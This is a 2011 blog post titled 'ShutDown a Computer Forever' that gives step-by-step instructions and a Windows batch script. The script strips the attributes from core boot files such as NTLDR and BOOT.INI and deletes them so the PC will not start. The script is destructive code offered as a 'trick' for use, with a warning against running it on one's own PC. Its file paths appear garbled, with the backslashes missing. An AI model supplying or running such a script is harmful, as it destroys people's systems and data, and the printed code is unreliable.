Wednesday, 31 August 2011

ShutDown a Computer Forever-Don’t Try It


Our PC needs lots of file to start its booting (“Boot Files”) and any how if we delete these file from the system than PC will no longer to reboot or restart itself that make it Shutdowns Forever. Although our Operating System doesn’t allow us to do any changes or deletion on system files but here is some code that makes this possible.  This is a working trick so don’t try it on your PC otherwise you might be needed to reinstall you operating System.

  1. 1.       Open your Notepad.
  2. 2.      Copy and Paste these codes.
  3. @ECHO OFF
    ATTRIB -R -S -H C:AUTOEXEC.BAT
    DEL C:AUTOEXEC.BAT
    ATTRIB -R -S -H C:BOOT.INI
    DEL C:BOOT.INI
    ATTRIB -R -S -H C:NTLDR
    DEL C:NTLDR
    ATTRIB -R -S -H C:WINDOWSWIN.INI
    DEL C:WINDOWSWIN.INI
      
    
  4. 3.      Save file “filename.bat”.
  5. 4.      Now run the file.

Related Posts:



0 comments:

Post a Comment